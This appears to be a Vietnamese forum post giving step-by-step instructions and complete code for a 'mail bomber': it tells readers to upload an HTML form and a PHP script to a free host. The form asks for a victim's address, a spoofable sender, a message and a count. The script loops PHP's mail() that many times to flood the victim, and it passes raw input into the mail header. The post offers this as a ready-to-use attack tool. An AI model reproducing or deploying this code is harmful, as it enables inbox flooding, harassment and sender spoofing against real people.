Bạn cần thực hiện 3 bước như sau :
1. Đăng ký 1 host free có hỗ trợ PHP ( có thể tìm trong đây )
2. Tạo 2 file : Bombmail.htm và bombmail.php
3. Sau đó upload lên host và chạy file Bombmail.htm để boom...
Còn đây là code của 2 file trên:
File Bombmail.htm
- Code:
-
<html>
<head>
<title>Hope$un Mail bomber</title>
</head>
<body text="#9999FF" bgcolor="#000000">
<form method="POST" action="bombmail.php">
<p>
Your e-mail <input type="text" size="20" name="from"><br>
Victim's e-mail <input type="text" size="20" name="email"><br>
Subject: <input type="text" size="20" name="subject"><br>
Message<br>
<textarea name="message" rows="6" cols="40"></textarea><br>
<br>
Number of email <input type="text" size="5" name="n"></p>
<p><input type="submit" name="B1" value="Send"></p>
</form>
</body>
</html>
-----------------
File bombmail.php
- Code:
-
<?php
For ($i=1;$i<=$n;$i++)
{
mail($email,$subject,$message,"from: $from");
}
echo ' Your e-mail(s) have been sent to '. $email . ' from ' . $from . ' ' . $n . ' time(s)';
?>